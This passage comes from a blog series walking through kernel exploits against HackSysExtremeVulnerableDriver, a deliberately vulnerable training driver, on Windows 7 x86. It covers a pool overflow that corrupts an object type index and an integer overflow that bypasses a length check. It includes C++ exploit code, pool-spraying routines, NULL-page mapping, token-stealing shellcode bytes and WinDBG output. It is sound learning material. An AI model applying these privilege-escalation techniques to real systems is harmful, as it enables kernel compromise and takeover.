829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry, 82997760, is array index 0, then 0xc index is going to be 85053520. Let’s get WinDBG to spill the beans on this type and let’s see if its indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0

Using -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we absolutely have honed in on the pointer to Event objects as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here, is that at offset 0x28 we see the TypeInfo structure. One of it’s members, the CloseProcedure is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the data referenced by the OBJECT_TYPE pointer we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when use CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is the kernel goes to the address referenced by the array index value 0xc and looks at offset 0x60 from there for a function pointer and calls the function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
----SNIP----

The first function pointer is 0x00000000 and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the value 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead. We’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will start looking for offset 0x60 for a function pointer from 0x00000000. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
            }
        }
    }
    cout << "[>] Holes poked lol.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else in between our 0x200 allocation and this byte need to remain the same or we’ll get a BSOD.

Let’s just use the dd command to dump 32 DWORD values from the beginning of the Event Objects right after our kernel buffer real quick. repaste in here the memory pane view of an Event Object, and you can see how I formulate the input buff in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000
----SNIP----

Right. So we need to keep everything but the starred 0xc intact and overwrite this single byte with 0x0. Looks like we’re overwriting 40 bytes in total or 0x28, which gives us an input buffer size of 0x220. We’ll make an overwrite_payload variable that is a byte buffer and well copy it into the last 0x28 bytes of a 0x220 sized buffer with our original \x42 values taking up the first 0x1F8 bytes as follows:

 ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x40\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x01\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x08\x00" // 0xc converted to 0x0
        );

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28)

We’ll also want to allocate the NULL page which I pulled directly from tekwizzz123.

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 
        (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateVirtualMemory");

    INT64 address = 0x1;
    int size = 0x100;

    HANDLE result = (HANDLE)NtAllocateVirtualMemory(
        GetCurrentProcess(),
        (PVOID*)&address,
        NULL,
        (PSIZE_T)&size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (result == INVALID_HANDLE_VALUE) {
        cout << "[!] Unable to allocate NULL page...wtf?\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);

}

I’ll also fill the NULL page with pure \x41 values so that we should run this code and get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Sequential allocations freed.\n";
}

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0 and you can see how it differs from the next Event Object as I’ve marked them with asteriks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  [email protected].
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (
		"\x60"
		"\x64\xA1\x24\x01\x00\x00"
		"\x8B\x40\x50"
		"\x89\xC1"
		"\x8B\x98\xF8\x00\x00\x00"
		"\xBA\x04\x00\x00\x00"
		"\x8B\x80\xB8\x00\x00\x00"
		"\x2D\xB8\x00\x00\x00"
		"\x39\x90\xB4\x00\x00\x00"
		"\x75\xED"
		"\x8B\x90\xF8\x00\x00\x00"
		"\x89\x91\xF8\x00\x00\x00"
		"\x61"
		"\xC3"
		);

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001)

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack setting up our call to dword ptr [esp+0x60] which we would need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.

Getting an nt authority/system shell »>

Full exploit code: here

Conclusion

That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Integer Overflow

The Human Machine Interface

h0mbre

20 April 2020 at 04:00

Introduction

This series will be light on tangential information such as:

how drivers work, the different types, communication between userland, the kernel, and drivers, etc
how to install HEVD,
how to set up a lab environment
shellcode analysis

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set 0xFFFFFFFF which overflows the integer size and wraps the value around back to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value is now over 8 bytes in length, so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var1 = 0xFFFFFFFF;
	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";
}

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: move ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually its a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets +4 added to it and then loaded into to eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi which we can see holds 0x800. If the eax is equal to or more than 0x800, we can see that take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this to quotient to edi which was zeroed out previously and has remained up until now unchanged. If length/4 quotient is the same or more than the counter, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our length is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0BAD0B0B0. If they are the same value, we move towards exiting the function. So, so far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4 OR if the 4 byte value located at [ebp+8] is equal to 0BAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now, edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 is where the pointer is to our input buffer. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move now to the next 4 bytes. We see also that edi incremented and we now understand what is taking place.

As long as:

the length of our buffer + 4 is < 0x800,
the Counter variable (edi) is < the length of our buffer divided by 4,
and the 4 byte value in eax is not 0BAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.

There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?

Manipulating `DWORD nInBufferSize`

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    

    BYTE input_buff[0x751] = { 0 };

    // 'A' * 1871
    memset(
        input_buff,
        '\x41',
        0x750);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        sizeof(input_buff) - 1,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);
}

What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

the length of our buffer + 4 is < 0x800,
the Counter variable (edi) is < the length of our buffer divided by 4,
and the 4 byte value in eax is not 0BAD0B0B0

We should pass the first check since our buffer is indeed small enough. This second check will eventually make us exit the function since our length divided by 4, will eventually be caught by the Counter as it increments every 4 byte copy. We don’t have to worry about the third check as we don’t have this string in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read-operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”

We resume from here, we hit our breakpoint.

Take a look at edi, we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now, we’re doing a comparison on the 4 byte value at this address to ecx or bad0b0b0. We won’t hit that criteria but on the next iteration, our counter will be == to 0x1d4 and thus, we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF and watch us sail right through length check and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will pass the length check now for sure, which we saw coming, the other really interesting thing that we took note of previously but can see playing out here is that ebx has been left undisturbed and is at 0xffffffff still. This is the register used in the arithmetic to determine whether or not the Counter should keep iterating or not. This value is eventually loaded into eax and divided by 4!. 0xfffffffff divided by 4 will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.

THIS IS NOT GOOD

Overwriting arbitrary memory in the kernel space is dangerous business. We can’t corrupt anything more than we absolutely have to. We need a way to terminate the copying function. In comes the terminator string of 0BAD0B0B0 to the rescue. If the 4 byte value in the user buffer is 0BAD0B0B0, we cease copying and exit the function. Obviously we BSOD here.

So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like stack buffer overflow post, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
